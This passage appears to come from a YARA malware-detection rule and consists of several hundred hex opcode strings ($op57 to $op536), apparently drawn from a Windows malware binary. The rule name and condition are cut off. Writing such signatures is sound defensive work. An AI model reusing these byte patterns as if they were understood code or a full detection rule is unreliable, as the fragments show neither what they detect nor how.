68585c4300ff7588a1a8794400ff9090 } /* Opcode */ $op57 = { 78274300c78424b0 } /* Opcode */ $op58 = { 3d230000c0740b3d050000800f85c7 } /* Opcode */ $op59 = { a1a879440068345f440057ff90f40300 } /* Opcode */ $op60 = { 0fbf40483b45cc751d508b45e483c04c } /* Opcode */ $op61 = { 836424180059598bd8c74424207cb542 } /* Opcode */ $op62 = { 681c5c4300ff7588a1a8794400ff9090 } /* Opcode */ $op63 = { 5c284300c78424f0 } /* Opcode */ $op64 = { 59593bc3744a837dcc00741fff75f8a1 } /* Opcode */ $op65 = { 60f94200c78424d8 } /* Opcode */ $op66 = { 94274300c78424b8 } /* Opcode */ $op67 = { 895c2440895c2444ff90c40300005959 } /* Opcode */ $op68 = { 8bd859598d45ec50a1a87944008d7b02 } /* Opcode */ $op69 = { ff90680100008bf08d45fc50a1a87944 } /* Opcode */ $op70 = { a1a879440068e85e440057ff90f40300 } /* Opcode */ $op71 = { ff45f88d474450a1a8794400ff909803 } /* Opcode */ $op72 = { ff45f88d474450a1a8794400ff909803 } /* Opcode */ $op73 = { 44b44200c78424d0 } /* Opcode */ $op74 = { 595985c0754f6834584300ff75b8a1a8 } /* Opcode */ $op75 = { 8b44242483c00450ff7508e824e6ffff } /* Opcode */ $op76 = { 60404400c7842488 } /* Opcode */ $op77 = { 6a1a4000c781a40100004eaa4100c781 } /* Opcode */ $op78 = { 8bf859593bfe750433c0eb353975107e } /* Opcode */ $op79 = { 59596a055e3bc775103935d479440075 } /* Opcode */ $op80 = { 8975ec8975f0ff900c0300005f5e85c0 } /* Opcode */ $op81 = { 8975ec8975f0ff900c0300005f5e85c0 } /* Opcode */ $op82 = { 57ff75088945dca1a8794400ff90b8 } /* Opcode */ $op83 = { 583b4400c7842488 } /* Opcode */ $op84 = { 83c40c8b45fc8b4df489086881 } /* Opcode */ $op85 = { 0c274300c7842490 } /* Opcode */ $op86 = { 2c184300c78424f4 } /* Opcode */ $op87 = { a1a879440068185f440057ff90f40300 } /* Opcode */ $op88 = { ff7424148bf0a1a879440056ff90fc } /* Opcode */ $op89 = { a1a87944006894e5430053ff9090 } /* Opcode */ $op90 = { 8d44240c50a1a8794400ff90f8010000 } /* Opcode */ $op91 = { 85c00f95c0595984c0743dff75f4a1a8 } /* Opcode */ $op92 = { 59598bf8eb308d471050ff75fca1a879 } /* Opcode */ $op93 = { 
50ff750ca1a879440057ff90ac020000 } /* Opcode */ $op94 = { 595985c00f856901000068705a4300ff } /* Opcode */ $op95 = { 914300c784245806000014914300c784 } /* Opcode */ $op96 = { a1a87944006a006870e04300ff7508ff } /* Opcode */ $op97 = { b0684300c78424ac } /* Opcode */ $op98 = { 8b433a8b4dfc8d048803c650a1a87944 } /* Opcode */ $op99 = { 04414400c78424a0 } /* Opcode */ $op100 = { 883b4400c784249c } /* Opcode */ $op101 = { 30284300c78424e4 } /* Opcode */ $op102 = { c6059179440001892d9c794400892598 } /* Opcode */ $op103 = { c6059179440001892d9c794400892598 } /* Opcode */ $op104 = { 595985c00f85340200006804564300ff } /* Opcode */ $op105 = { a13ca0420089819c030000a118a04200 } /* Opcode */ $op106 = { 595985c00f858b02000068bc554300ff } /* Opcode */ $op107 = { 6c684300c78424a0 } /* Opcode */ $op108 = { 83c4108945ec8d45bc50a1a879440056 } /* Opcode */ $op109 = { f0424400c78424e0 } /* Opcode */ $op110 = { 30f84200c7842494 } /* Opcode */ $op111 = { 8bf0a1a879440068b4b7420056ff90fc } /* Opcode */ $op112 = { 595985c00f850905000068b8534300ff } /* Opcode */ $op113 = { 595985c0756868b85b4300ff7588a1a8 } /* Opcode */ $op114 = { a1a8794400beff7f00005653ff90b8 } /* Opcode */ $op115 = { 595985c075686818584300ff75b8a1a8 } /* Opcode */ $op116 = { 83c4148bc65ec3558bec83ec14837d0c } /* Opcode */ $op117 = { 85c0a1a8794400750f5653ff902c0100 } /* Opcode */ $op118 = { 3d220000c0740732c0e9be } /* Opcode */ $op119 = { b4434400c7842400010000c4434400c7 } /* Opcode */ $op120 = { ff75f88d431050ff7508a1a8794400ff } /* Opcode */ $op121 = { 48f94200c78424d4 } /* Opcode */ $op122 = { ff75f4a1a879440053683cc843006854 } /* Opcode */ $op123 = { ff75fca1a8794400576814c743006830 } /* Opcode */ $op124 = { 81f9d03f00000f8e9c } /* Opcode */ $op125 = { 689461440068b06144008bf8a1a87944 } /* Opcode */ $op126 = { b0ad4300c7842488 } /* Opcode */ $op127 = { 85c07581881e837dfc02752c8d45d450 } /* Opcode */ $op128 = { ff75fca1a87944005768e0c6430068fc } /* Opcode */ $op129 = { ff751050ff7508a1a8794400ff905001 } /* Opcode */ 
$op130 = { ff750c8945f86898e143006854e24300 } /* Opcode */ $op131 = { 59598bf08d45f450a1a8794400680780 } /* Opcode */ $op132 = { 83c40cff75fcff7508a1a8794400ff90 } /* Opcode */ $op133 = { 83c40cff75fcff7508a1a8794400ff90 } /* Opcode */ $op134 = { 83c40cff75fcff7508a1a8794400ff90 } /* Opcode */ $op135 = { ff75fca1a87944006a0268a0c7430068 } /* Opcode */ $op136 = { 8b50245685d20f8ee2 } /* Opcode */ $op137 = { d4424400c78424dc } /* Opcode */ $op138 = { 68feff0000ff7508ff90b8 } /* Opcode */ $op139 = { a8414400c78424b4 } /* Opcode */ $op140 = { 595985c00f858601000068ac564300ff } /* Opcode */ $op141 = { 595985c0756868905c4300ff7588a1a8 } /* Opcode */ $op142 = { 8365f8008365fc00578b7d0c85ff0f84 } /* Opcode */ $op143 = { 80751583780800740fa1a87944005756 } /* Opcode */ $op144 = { 85c07579ff74241ca1a8794400ff750c } /* Opcode */ $op145 = { 83c428381dad7944007419ff75f8a1a8 } /* Opcode */ $op146 = { a0ae4300c78424c8 } /* Opcode */ $op147 = { 25a24100c781d40300008c514100c781 } /* Opcode */ $op148 = { 595985c00f85b204000068f0534300ff } /* Opcode */ $op149 = { 85c074b6ff75fca1a8794400ff906002 } /* Opcode */ $op150 = { 8975d8894ddc8975e48975e8ff90bc02 } /* Opcode */ $op151 = { e0674300c7842488 } /* Opcode */ $op152 = { 58694300c78424cc } /* Opcode */ $op153 = { 50284300c78424ec } /* Opcode */ $op154 = { 595985c00f85dd0100006840564300ff } /* Opcode */ $op155 = { 595985c0751d68105c4300ff7588a1a8 } /* Opcode */ $op156 = { f4f94200c78424f8 } /* Opcode */ $op157 = { 98164300c7842490 } /* Opcode */ $op158 = { b54200c784240801000010b54200c784 } /* Opcode */ $op159 = { acf94200c78424e4 } /* Opcode */ $op160 = { a1a87944008d5f106814de430053ff90 } /* Opcode */ $op161 = { 08af4300c78424e8 } /* Opcode */ $op162 = { 20184300c78424ec } /* Opcode */ $op163 = { 56689c56440068ff7f00008945f850a1 } /* Opcode */ $op164 = { 8d45f850a1a8794400ff90f801000083 } /* Opcode */ $op165 = { 595985c00f85c001000068345a4300ff } /* Opcode */ $op166 = { 83c4188945fc837dfc00752a6880 } /* Opcode */ $op167 = { 
5f3d230000c075578b45ec03c0668945 } /* Opcode */ $op168 = { 4c174300c78424b4 } /* Opcode */ $op169 = { 8b45a4595985c075038b45b005001000 } /* Opcode */ $op170 = { 8bd8595985db0f8490 } /* Opcode */ $op171 = { a8ef4200c78424ec } /* Opcode */ $op172 = { b870794400bf34b042002bc78945e40f } /* Opcode */ $op173 = { 9cf94200c78424e0 } /* Opcode */ $op174 = { 595985c00f853508000068bc514300ff } /* Opcode */ $op175 = { 85c07405e9ef100000ff7514ff75c8ff } /* Opcode */ $op176 = { 24f94200c78424cc } /* Opcode */ $op177 = { ff7518ff75145753ff908402000083c4 } /* Opcode */ $op178 = { 85c00f8464fcffffff74240ca1a87944 } /* Opcode */ $op179 = { 595985c0756068f4584300ff75b8a1a8 } /* Opcode */ $op180 = { 5f8b45fc5e5bc9c3558bec83e4f883ec } /* Opcode */ $op181 = { b0b44200c78424f4 } /* Opcode */ $op182 = { 595985c075365650a1a879440057ff90 } /* Opcode */ $op183 = { 8bd88b450c8bf85903c659895d108945 } /* Opcode */ $op184 = { 783b4400c7842494 } /* Opcode */ $op185 = { 595985c0741ba1a87944006858e44300 } /* Opcode */ $op186 = { f4404400c784249c } /* Opcode */ $op187 = { 57ff75088945c8a1a8794400ff90b8 } /* Opcode */ $op188 = { 50a1a8794400576864bf43006894c043 } /* Opcode */ $op189 = { 8b450c8b4d142bc883e90651ff75fc8d } /* Opcode */ $op190 = { 8b4e2485c90f84e6 } /* Opcode */ $op191 = { d4414400c78424bc } /* Opcode */ $op192 = { ff75f8a1a8794400576804c143006818 } /* Opcode */ $op193 = { 68e0094400ff75fcff91600100008b0d } /* Opcode */ $op194 = { 595985c00f8532020000ff75d4a1a879 } /* Opcode */ $op195 = { 564000c741700a284000c78130040000 } /* Opcode */ $op196 = { 508d44245450a1a8794400c744245818 } /* Opcode */ $op197 = { 595985c00f856a0700006828524300ff } /* Opcode */ $op198 = { b0694300c78424d8 } /* Opcode */ $op199 = { 983b4400c78424a4 } /* Opcode */ $op200 = { 08184300c78424e4 } /* Opcode */ $op201 = { a1a879440056ff750cff907c0100008b } /* Opcode */ $op202 = { 83c40cff75bcff75bc0fb705b8794400 } /* Opcode */ $op203 = { 68b8584300ff75b8a1a8794400ff9090 } /* Opcode */ $op204 = { 3935d47944000f859b } /* 
Opcode */ $op205 = { 595985c00f85950400006808544300ff } /* Opcode */ $op206 = { 83c4108944241c8d44242c5056ff7424 } /* Opcode */ $op207 = { 8944241ca1a8794400680829440056ff } /* Opcode */ $op208 = { 3b4300c7842438060000103b4300c784 } /* Opcode */ $op209 = { f17a4000c78188010000f8944100c781 } /* Opcode */ $op210 = { 837d0c007505e98d } /* Opcode */ $op211 = { b44300c78424600200000cb44300c784 } /* Opcode */ $op212 = { 143c4400c78424d4 } /* Opcode */ $op213 = { 595985c00f85870700006818524300ff } /* Opcode */ $op214 = { 40184300c78424f8 } /* Opcode */ $op215 = { a1a87944005756ff902c01000083c428 } /* Opcode */ $op216 = { 595985c00f859e020000ff75c4a1a879 } /* Opcode */ $op217 = { ff74242ca1a879440068c863430053ff } /* Opcode */ $op218 = { 8b413c3bc30f84e0 } /* Opcode */ $op219 = { babebff202b91204ca01a3a479440089 } /* Opcode */ $op220 = { 595985c00f8554010000a1a879440068 } /* Opcode */ $op221 = { 224300c784242403000018224300c784 } /* Opcode */ $op222 = { d83b4400c78424c0 } /* Opcode */ $op223 = { 53684ce34300568945c050a1a8794400 } /* Opcode */ $op224 = { 44ef4200c78424d4 } /* Opcode */ $op225 = { 7c3c4400c78424f4 } /* Opcode */ $op226 = { 598bf0598b4d0889750c85db7e6d578a } /* Opcode */ $op227 = { 874300c78424a803000008874300c784 } /* Opcode */ $op228 = { 84174300c78424bc } /* Opcode */ $op229 = { b8404400c7842490 } /* Opcode */ $op230 = { 8364241800c70500b04200222700008b } /* Opcode */ $op231 = { 836424140059598bd8beff7f000033c0 } /* Opcode */ $op232 = { 5f85c07404b001c9c3a1a87944005356 } /* Opcode */ $op233 = { 85c00f851f020000ff742424a1a87944 } /* Opcode */ $op234 = { 8bf0a1a87944006848b7420056ff9060 } /* Opcode */ $op235 = { 6868574300ff75b8a1a8794400ff9090 } /* Opcode */ $op236 = { 1cae4300c78424a8 } /* Opcode */ $op237 = { 68284300c78424f4 } /* Opcode */ $op238 = { 59598945f48b45fcff308b45fc83c004 } /* Opcode */ $op239 = { 8bf00fb705b879440050a1a879440068 } /* Opcode */ $op240 = { ac274300c78424c0 } /* Opcode */ $op241 = { 568d441b0250ff7514a1a8794400ff90 } /* Opcode 
*/ $op242 = { 043c4400c78424d0 } /* Opcode */ $op243 = { 595985c00f85e70300006874544300ff } /* Opcode */ $op244 = { c4404400c7842494 } /* Opcode */ $op245 = { 74754000c7812004000082964100c781 } /* Opcode */ $op246 = { 78414400c78424ac } /* Opcode */ $op247 = { 986a4300c78424f4 } /* Opcode */ $op248 = { 595985c00f855603000068fc544300ff } /* Opcode */ $op249 = { f0f84200c78424bc } /* Opcode */ $op250 = { ff4b148b5f3a035d0c837da80059590f } /* Opcode */ $op251 = { e8274300c78424d0 } /* Opcode */ $op252 = { 895c2464895c2468ff90bc0200003d22 } /* Opcode */ $op253 = { 834b1cff5959eb178b4df00500f0ffff } /* Opcode */ $op254 = { a1a879440056ff9000040000a1a87944 } /* Opcode */ $op255 = { 83c40c6814594300ff7588a1a8794400 } /* Opcode */ $op256 = { fb4200c784243401000010fb4200c784 } /* Opcode */ $op257 = { a1a879440083c40cff742418ff907401 } /* Opcode */ $op258 = { 8975ec8975f0ff900c030000f7d81bc0 } /* Opcode */ $op259 = { 20af4300c78424f4 } /* Opcode */ $op260 = { 3c274300c78424a0 } /* Opcode */ $op261 = { 595985c00f855102000068f0554300ff } /* Opcode */ $op262 = { 595985c0754f68d45b4300ff7588a1a8 } /* Opcode */ $op263 = { 60ef4200c78424dc } /* Opcode */ $op264 = { 595985c00f85e20200006860554300ff } /* Opcode */ $op265 = { 10af4300c78424ec } /* Opcode */ $op266 = { 83c0083bc30f84ab } /* Opcode */ $op267 = { 85db7456ff75108bf0ff750ca1a87944 } /* Opcode */ $op268 = { d8ef4200c78424f4 } /* Opcode */ $op269 = { 70424400c78424d0 } /* Opcode */ $op270 = { 59598d4dec51568bf833c057508945fc } /* Opcode */ $op271 = { 59593bc37461a1a879440068dce54300 } /* Opcode */ $op272 = { 595985c00f85f60600006870524300ff } /* Opcode */ $op273 = { 68b0424300ff75f057ff905001000083 } /* Opcode */ $op274 = { 59598bd88d45f050565357897dfc57e9 } /* Opcode */ $op275 = { ff750c8bd8a1a87944006800b1420068 } /* Opcode */ $op276 = { 8d45ec50ff75fca1a8794400ff90f802 } /* Opcode */ $op277 = { 595983670400836708008b450c5fc9c3 } /* Opcode */ $op278 = { ff75f0a1a879440068f0c8430056ff50 } /* Opcode */ $op279 = { 
595985c00f8517020000ff75c0a1a879 } /* Opcode */ $op280 = { 0f825affffff5f5e8be55dc3558bec83 } /* Opcode */ $op281 = { 8975e48975e88975fcff90bc02000085 } /* Opcode */ $op282 = { ff4424148d474450a1a8794400ff9098 } /* Opcode */ $op283 = { 30174300c78424ac } /* Opcode */ $op284 = { 595985c00f85a407000068fc514300ff } /* Opcode */ $op285 = { 837d100159598bf07510ff750cff35bc } /* Opcode */ $op286 = { 595985c00f85f10500006824534300ff } /* Opcode */ $op287 = { fc274300c78424d4 } /* Opcode */ $op288 = { 88f84200c78424a8 } /* Opcode */ $op289 = { b24300c78424d401000008b24300c784 } /* Opcode */ $op290 = { 30ae4300c78424ac } /* Opcode */ $op291 = { 53ff75088bf0a1a8794400ff90780200 } /* Opcode */ $op292 = { 8c404400c784248c } /* Opcode */ $op293 = { 83c4188945fc837dfc00746c8b45fc81 } /* Opcode */ $op294 = { 8b45fc8b008d44000250ff7508a1a879 } /* Opcode */ $op295 = { c8ad4300c7842490 } /* Opcode */ $op296 = { 64174300c78424b8 } /* Opcode */ $op297 = { 85c07524ff74240ca1a8794400ff7508 } /* Opcode */ $op298 = { 595985c00f85bc0600006894524300ff } /* Opcode */ $op299 = { 895dd4897ddc895de0895de4ff90bc02 } /* Opcode */ $op300 = { f4b34200c78424b4 } /* Opcode */ $op301 = { 8b45fc0fb7400483f8250f85d9 } /* Opcode */ $op302 = { 59595e837df40074198b470805001000 } /* Opcode */ $op303 = { 50a1a87944005356ff90bc } /* Opcode */ $op304 = { 8b463a03c350a1a8794400ff90040400 } /* Opcode */ $op305 = { 44f84200c7842498 } /* Opcode */ $op306 = { 595985c00f85fb07000068d4514300ff } /* Opcode */ $op307 = { ff75fca1a8794400576804c643006820 } /* Opcode */ $op308 = { 90414400c78424b0 } /* Opcode */ $op309 = { 70164300c7842484 } /* Opcode */ $op310 = { 1cf04200c784240001000038f04200c7 } /* Opcode */ $op311 = { 68b4574300ff75b8a1a8794400ff9090 } /* Opcode */ $op312 = { e0f94200c78424f4 } /* Opcode */ $op313 = { 83c40c68fc8043008d45c050a1a87944 } /* Opcode */ $op314 = { 59595656ff74243889442424508d4424 } /* Opcode */ $op315 = { 8b45f88038030f85fc } /* Opcode */ $op316 = { 14434400c78424e4 } /* Opcode */ $op317 
= { 30ee4200c7842488 } /* Opcode */ $op318 = { 85c07405e9500100006a018d45e8508d } /* Opcode */ $op319 = { 59598bf8895df4895df8c645ff01eb51 } /* Opcode */ $op320 = { cc174300c78424d4 } /* Opcode */ $op321 = { 68b34200c7842498 } /* Opcode */ $op322 = { 354300c784247804000010354300c784 } /* Opcode */ $op323 = { 10d54000b89ba64100898174030000c7 } /* Opcode */ $op324 = { 48424400c78424c8 } /* Opcode */ $op325 = { 85c07535a1a8794400538db8c4010000 } /* Opcode */ $op326 = { 68feff0000ff750889442424a1a87944 } /* Opcode */ $op327 = { b76c4000c781500200003e6f4000c741 } /* Opcode */ $op328 = { 395d14598bf0598975f87e36578b4510 } /* Opcode */ $op329 = { 8bf80fb705b879440050a1a879440068 } /* Opcode */ $op330 = { 595985c00f851808000068c8514300ff } /* Opcode */ $op331 = { a24300c78424440b000008a24300c784 } /* Opcode */ $op332 = { ff75f8a1a8794400576898c0430068b0 } /* Opcode */ $op333 = { 595985c00f856901000068d0564300ff } /* Opcode */ $op334 = { d8274300c78424cc } /* Opcode */ $op335 = { a1a879440083c450ff75fc5768a4c643 } /* Opcode */ $op336 = { 663bd8740a46460fb7066685c075d333 } /* Opcode */ $op337 = { 98b44200c78424ec } /* Opcode */ $op338 = { 85c00f84f2feffffa1a879440053ff75 } /* Opcode */ $op339 = { 595985c00f85390300006814554300ff } /* Opcode */ $op340 = { ff35d079440089442428684474430056 } /* Opcode */ $op341 = { 59598bf88d44241450ff7424188d4424 } /* Opcode */ $op342 = { a1a87944008d5e0c68a8dd430053ff90 } /* Opcode */ $op343 = { ff90c403000059598d45e050a1a87944 } /* Opcode */ $op344 = { 5353ff35bc7944008945d4a1a8794400 } /* Opcode */ $op345 = { 68478000006a008944242450a1a87944 } /* Opcode */ $op346 = { 5068000010808d44245050a1a8794400 } /* Opcode */ $op347 = { 543c4400c78424e8 } /* Opcode */ $op348 = { 595985c00f851201000068ec5a4300ff } /* Opcode */ $op349 = { d4164300c784249c } /* Opcode */ $op350 = { a8ee4200c78424a4 } /* Opcode */ $op351 = { f83b4400c78424cc } /* Opcode */ $op352 = { 595985c00f8571010000a1a879440068 } /* Opcode */ $op353 = { f4ee4200c78424bc } /* Opcode */ 
$op354 = { 808d45f850a1a87944006a00ff5044c9 } /* Opcode */ $op355 = { 83c40c8b45f85e5f5bc9c3558bec51a1 } /* Opcode */ $op356 = { 895de4895de8ff90bc02000085c07d07 } /* Opcode */ $op357 = { ff75148b45fc83c00450ff750ca1a879 } /* Opcode */ $op358 = { 30b44200c78424c8 } /* Opcode */ $op359 = { fc694300c78424e0 } /* Opcode */ $op360 = { 68274300c78424ac } /* Opcode */ $op361 = { bcef4200c78424f0 } /* Opcode */ $op362 = { a1a879440083c440ff7510681cb74200 } /* Opcode */ $op363 = { 7cb44200c78424e0 } /* Opcode */ $op364 = { 24284300c78424e0 } /* Opcode */ $op365 = { a0b44200c78424f0 } /* Opcode */ $op366 = { 50a1a879440051ff90b8 } /* Opcode */ $op367 = { 8d47fc50a1a879440053ff90b4 } /* Opcode */ $op368 = { 5c274300c78424a8 } /* Opcode */ $op369 = { 8975e48975e8ff90bc0200003d220000 } /* Opcode */ $op370 = { 59598945ec0fb705b879440050687444 } /* Opcode */ $op371 = { 56ff7424188bf8a1a879440057ff90d0 } /* Opcode */ $op372 = { 194300c78424100100001c194300c784 } /* Opcode */ $op373 = { a1a87944005653ff902c01000083c41c } /* Opcode */ $op374 = { 8d4744685c61430050a1a8794400ff90 } /* Opcode */ $op375 = { 8b46048b0d987944008988c4 } /* Opcode */ $op376 = { a1a8794400536800080000ff7508ff90 } /* Opcode */ $op377 = { 5150a1a8794400ff90b8 } /* Opcode */ $op378 = { 5150a1a8794400ff90b8 } /* Opcode */ $op379 = { ac174300c78424c8 } /* Opcode */ $op380 = { 83c410ff75108945f88d45dc50a1a879 } /* Opcode */ $op381 = { 595985c00f85120100006850574300ff } /* Opcode */ $op382 = { 0f8260ffffffa1a879440068a0384400 } /* Opcode */ $op383 = { 8b44240c83c04468dc7f430050a1a879 } /* Opcode */ $op384 = { bcb44200c78424f8 } /* Opcode */ $op385 = { 895dcc894dd0895dd8895ddcff90bc02 } /* Opcode */ $op386 = { 20274300c7842498 } /* Opcode */ $op387 = { 59598bf88d44242050ff7424248d4424 } /* Opcode */ $op388 = { 59598bf08d45fc50ff75fc8d45f4566a } /* Opcode */ $op389 = { a1a879440083c40cff74240cff907401 } /* Opcode */ $op390 = { e989feffffa1a87944005357685cb042 } /* Opcode */ $op391 = { 28af4300c78424f8 } /* Opcode */ 
$op392 = { 595985c00f856e0200006870594300ff } /* Opcode */ $op393 = { ff75108bf8a1a87944006810b7420056 } /* Opcode */ $op394 = { 3935d47944000f85c6 } /* Opcode */ $op395 = { 924300c78424a006000010924300c784 } /* Opcode */ $op396 = { ecee4200c78424b8 } /* Opcode */ $op397 = { 595985c00f852f01000068c85a4300ff } /* Opcode */ $op398 = { 8b4e24c1e10251ff75fc8945f850a1a8 } /* Opcode */ $op399 = { 6a228d45ec50ff757ca1a8794400c745 } /* Opcode */ $op400 = { 58414400c78424a8 } /* Opcode */ $op401 = { 897dc4897dc8ff904803000085c00f85 } /* Opcode */ $op402 = { d03b4400c78424bc } /* Opcode */ $op403 = { 895c2464895c2468ff90bc02000085c0 } /* Opcode */ $op404 = { dcae4300c78424d8 } /* Opcode */ $op405 = { a1a8794400538b5d08565768feff0000 } /* Opcode */ $op406 = { 595985c00f858b0200006858594300ff } /* Opcode */ $op407 = { 943c4400c78424fc } /* Opcode */ $op408 = { b0ee4200c78424a8 } /* Opcode */ $op409 = { ff90bc02000085c0a1a87944007412ff } /* Opcode */ $op410 = { ff75108945f80fb7450c50a1a8794400 } /* Opcode */ $op411 = { 8b1584a042008991a4020000c7813802 } /* Opcode */ $op412 = { 895e10895e14ff90bc02000085c0742a } /* Opcode */ $op413 = { ff7510a1a87944006834b742005657ff } /* Opcode */ $op414 = { 595985c00f854d0700006844524300ff } /* Opcode */ $op415 = { 30ef4200c78424d0 } /* Opcode */ $op416 = { 595985c00f85c00100006864564300ff } /* Opcode */ $op417 = { 94ee4200c78424a0 } /* Opcode */ $op418 = { 8b6c24248b5c242059598bf8beff7f00 } /* Opcode */ $op419 = { 33db395d14598bf0598975fc7e2e8b45 } /* Opcode */ $op420 = { ff900c030000f7d81bc0f7d02345fc5f } /* Opcode */ $op421 = { 24b44200c78424c4 } /* Opcode */ $op422 = { 803b4400c7842498 } /* Opcode */ $op423 = { 57ff75088945e0a1a8794400ff90b8 } /* Opcode */ $op424 = { ff75fca1a8794400576838c643006850 } /* Opcode */ $op425 = { 68e0574300ff75b8a1a8794400ff9090 } /* Opcode */ $op426 = { 8b45fc8338040f8ee9 } /* Opcode */ $op427 = { 38b44200c78424cc } /* Opcode */ $op428 = { ff742448a1a879440053ff902c010000 } /* Opcode */ $op429 = { 
4c694300c78424c8 } /* Opcode */ $op430 = { 85c07402eb60ff75f4ff7518ff7508a1 } /* Opcode */ $op431 = { 6c434400c78424f4 } /* Opcode */ $op432 = { a1a8794400682ce54300ff75f8ff9090 } /* Opcode */ $op433 = { 8b44242083c00450ff7508a1a8794400 } /* Opcode */ $op434 = { a1a8794400595968a86b440068e06b44 } /* Opcode */ $op435 = { 28ee4200c7842484 } /* Opcode */ $op436 = { 85c074258d45f450a1a8794400ff90a4 } /* Opcode */ $op437 = { a1a879440056ff90d0030000a1a87944 } /* Opcode */ $op438 = { ff7508a1a8794400ff7308ff909c } /* Opcode */ $op439 = { e9b0feffffa1a879440053576850b042 } /* Opcode */ $op440 = { 598945f8598d45fc508d45f4508d45ec } /* Opcode */ $op441 = { 8bf8a1d079440033f65959897c24203b } /* Opcode */ $op442 = { 8975d88975e48975e8ff90bc02000053 } /* Opcode */ $op443 = { 59598bf88d45f450565753895dfc53e9 } /* Opcode */ $op444 = { c0174300c78424d0 } /* Opcode */ $op445 = { 8bf083c40c3bf375148d45fc50a1a879 } /* Opcode */ $op446 = { 595985c00f853e0400006848544300ff } /* Opcode */ $op447 = { e8ae4300c78424dc } /* Opcode */ $op448 = { 80ae4300c78424c0 } /* Opcode */ $op449 = { c7430c20020000895df0ff506853ff75 } /* Opcode */ $op450 = { e962feffffa1a879440053576864b042 } /* Opcode */ $op451 = { 595985c00f852605000068ac534300ff } /* Opcode */ $op452 = { 668b4d0a663bc874c7464666833e000f } /* Opcode */ $op453 = { 595985c00f85ec04000068c8534300ff } /* Opcode */ $op454 = { c0414400c78424b8 } /* Opcode */ $op455 = { 85c075d68d45c050a1a8794400ff501c } /* Opcode */ $op456 = { 40284300c78424e8 } /* Opcode */ $op457 = { 14284300c78424dc } /* Opcode */ $op458 = { ff75f8a1a87944005768d0c0430068e4 } /* Opcode */ $op459 = { ff75108bf8ff750ca1a879440068b460 } /* Opcode */ $op460 = { b03b4400c78424b0 } /* Opcode */ $op461 = { 836508008365f8008bd8668b46026648 } /* Opcode */ $op462 = { 595985c07415b301a1a87944005657ff } /* Opcode */ $op463 = { 59595656578bd8538d45f450a1a87944 } /* Opcode */ $op464 = { 595985c0757968d4584300ff75b8a1a8 } /* Opcode */ $op465 = { 595985c00f855b040000682c544300ff } /* 
Opcode */ $op466 = { a1a87944005657beff7f000056ff7508 } /* Opcode */ $op467 = { a1a87944005657beff7f000056ff7508 } /* Opcode */ $op468 = { 83c40c5f33c05e5dc3558bec83e4f883 } /* Opcode */ $op469 = { 59595f5ec3558bec83ec286a0a8d45d8 } /* Opcode */ $op470 = { a1a8794400689477440056ff90740300 } /* Opcode */ $op471 = { 595985c0754733c0668945b033c08d7d } /* Opcode */ $op472 = { 40694300c78424c4 } /* Opcode */ $op473 = { 595985c00f85300700006850524300ff } /* Opcode */ $op474 = { 8d45dc5068000108008d45fc50a1a879 } /* Opcode */ $op475 = { a14300c78424f80a00000ca14300c784 } /* Opcode */ $op476 = { d0ae4300c78424d4 } /* Opcode */ $op477 = { 30404400c7842484 } /* Opcode */ $op478 = { f8264300c784248c } /* Opcode */ $op479 = { e937feffff558bec83e4f881ec9c0100 } /* Opcode */ $op480 = { 04fa4200c78424fc } /* Opcode */ $op481 = { 20414400c78424a4 } /* Opcode */ $op482 = { 80434400c78424f8 } /* Opcode */ $op483 = { 34774000c781a4030000e3f940008991 } /* Opcode */ $op484 = { 104000c7810c040000ae2b4000c781c8 } /* Opcode */ $op485 = { 895c245c895c2460ff900c03000085c0 } /* Opcode */ $op486 = { b23e4000c7814c020000361b4000c781 } /* Opcode */ $op487 = { 595985c00f85040400006868544300ff } /* Opcode */ $op488 = { bc164300c7842498 } /* Opcode */ $op489 = { 50a1a8794400ff901c01000083c41ceb } /* Opcode */ $op490 = { dc684300c78424b4 } /* Opcode */ $op491 = { 3cf94200c78424d0 } /* Opcode */ $op492 = { b8f94200c78424e8 } /* Opcode */ $op493 = { cc274300c78424c8 } /* Opcode */ $op494 = { 3b05d8794400751b8b4604ff80b8 } /* Opcode */ $op495 = { ff750c8bd8a1a87944006880b0420068 } /* Opcode */ $op496 = { 83c4508d45f450a1a8794400ff90f801 } /* Opcode */ $op497 = { 58424400c78424cc } /* Opcode */ $op498 = { 817c2410102700000f8fd8 } /* Opcode */ $op499 = { 895de0895de4ff90bc02000089450c3d } /* Opcode */ $op500 = { 8b45080500f0ffff89461c53ff7708e8 } /* Opcode */ $op501 = { 50a1a87944005668306443005653ff90 } /* Opcode */ $op502 = { a1a87944008b405083c40c3bc3740b8d } /* Opcode */ $op503 = { 
83c40c834b0c048b075e5b5fc9c3558b } /* Opcode */ $op504 = { 72b6ff75f8a1a8794400ff7508ff902c } /* Opcode */ $op505 = { f0ad4300c7842498 } /* Opcode */ $op506 = { b4264300c7842484 } /* Opcode */ $op507 = { 595985c00f858e010000a1a879440068 } /* Opcode */ $op508 = { 38b34200c7842490 } /* Opcode */ $op509 = { ff75108bf8ff750ca1a879440068d85f } /* Opcode */ $op510 = { 50ee4200c7842494 } /* Opcode */ $op511 = { 8cae4300c78424c4 } /* Opcode */ $op512 = { 7cf94200c78424dc } /* Opcode */ $op513 = { ff742454a1a879440068406343006848 } /* Opcode */ $op514 = { ff750c50a1a8794400ff904001000059 } /* Opcode */ $op515 = { 14274300c7842494 } /* Opcode */ $op516 = { 89463a85c0744f897e288b7e3a037d08 } /* Opcode */ $op517 = { c8674300c7842484 } /* Opcode */ $op518 = { 3d230000c0740b3d050000800f85df } /* Opcode */ $op519 = { 3d230000c075618b45fc8d4400025089 } /* Opcode */ $op520 = { 83c41489451083f8ff0f84b6 } /* Opcode */ $op521 = { 595985c00f853402000068c0594300ff } /* Opcode */ $op522 = { 8974247489742478ff90bc02000085c0 } /* Opcode */ $op523 = { 8974247489742478ff90bc02000085c0 } /* Opcode */ $op524 = { a170a04200898128010000a19ca04200 } /* Opcode */ $op525 = { 895db0895db4ff90bc020000bf340000 } /* Opcode */ $op526 = { 83c414c60437008bc75f5ec3558bec83 } /* Opcode */ $op527 = { ff900c0300003d220000c00f8586 } /* Opcode */ $op528 = { 85c00f84a9fdffffff742418a1a87944 } /* Opcode */ $op529 = { 7c164300c7842488 } /* Opcode */ $op530 = { 59974100c7416cf8184000c781340100 } /* Opcode */ $op531 = { 8b48103bcb0f84eb } /* Opcode */ $op532 = { 8944241c8d474450ff750ca1a8794400 } /* Opcode */ $op533 = { 85c075138b45f0668378023a7509668b } /* Opcode */ $op534 = { 2a4300c7842468010000102a4300c784 } /* Opcode */ $op535 = { c8ee4200c78424ac } /* Opcode */ $op536 = { 83c40c6a0a83c71057568d45ec50ff75 } /* Opcode */ 